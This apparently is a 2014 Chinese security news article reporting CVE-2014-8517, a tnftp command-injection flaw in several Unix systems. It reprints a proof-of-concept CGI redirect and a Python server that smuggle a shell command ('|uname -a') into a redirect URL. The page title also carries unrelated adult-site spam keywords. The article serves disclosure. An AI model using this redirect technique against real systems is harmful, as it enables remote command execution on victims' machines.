压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

FTP曝嚴重遠程執行漏洞 影響多個版本Unix

責編:admin |2014-10-31 14:59:03

  10月28日,一份公開的郵件中曝出FTP遠程執行命令漏洞,漏洞影響到的Unix系統包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影響到了蘋果的OS X操作系統的最新版本Yosemite 10.10。

  NetBSD的一位開發人員(Jared McNeill)證實了這個漏洞可以通過tnftp從WEB服務器遠程執行惡意命令,并且此漏洞已被編號為CVE-2014-8517 :

  a20$ pwd     /var/www/cgi-bin     a20$ ls -l     total 4     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a     a20$ cat redirect     #!/bin/sh     echo 'Status: 302 Found'     echo 'Content-Type: text/html'     echo 'Connection: keep-alive'     echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'     echo     a20$   a20$ ftp http://localhost/cgi-bin/redirect   Trying ::1:80 …   ftp: Can't connect to `::1:80': Connection refused   Trying 127.0.0.1:80 …   Requesting http://localhost/cgi-bin/redirect   Redirected to http://192.168.2.19/cgi-bin/|uname%20-a   Requesting http://192.168.2.19/cgi-bin/|uname%20-a       32      101.46 KiB/s   32 bytes retrieved in 00:00 (78.51 KiB/s)   NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36   ADT 2014   Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE   BOARD evbarm   a20$漏洞影響范圍及公告

  Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple等系統開發商已經意識到了此漏洞的危害,其中Debian, Red Hat, Gnetoo and Novell已經發出了漏洞公告:

  漏洞檢測腳本(請勿用于非法用途)

  And you should see the command executed.All wrongs reversed – @stevelord"""import BaseHTTPServerimport sysimport socketimport urllibhostname = socket.getfqdn() # Set this to your IP if you have no FQDNport = 8000 # Set this to the port you want to run this oncmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying."cmd = urllib.quote(cmd)redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmdclass RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(s):  if cmd in s.path:   s.send_response(200)   s.end_headers()  else:   s.send_response(302)   s.send_header("Location", redir)   s.end_headers()if __name__ == "__main__": print "redirecting to,", redir server_class = BaseHTTPServer.HTTPServer httpd = server_class((hostname, port), RedirectHandler) try:  httpd.serve_forever()  print "Started serving." except KeyboardInterrupt:  pass httpd.server_close() print "
Stopped serving."解決方案和更詳細的內容參見:

  http://seclists.org/oss-sec/2014/q4/459 http://seclists.org/oss-sec/2014/q4/464

  http://seclists.org/oss-sec/2014/q4/460

 

上一篇:智能無懼挑戰 山石網科轟動RSA2015

下一篇:Bash破殼漏洞再變身:針對郵件服務器SMTP攻擊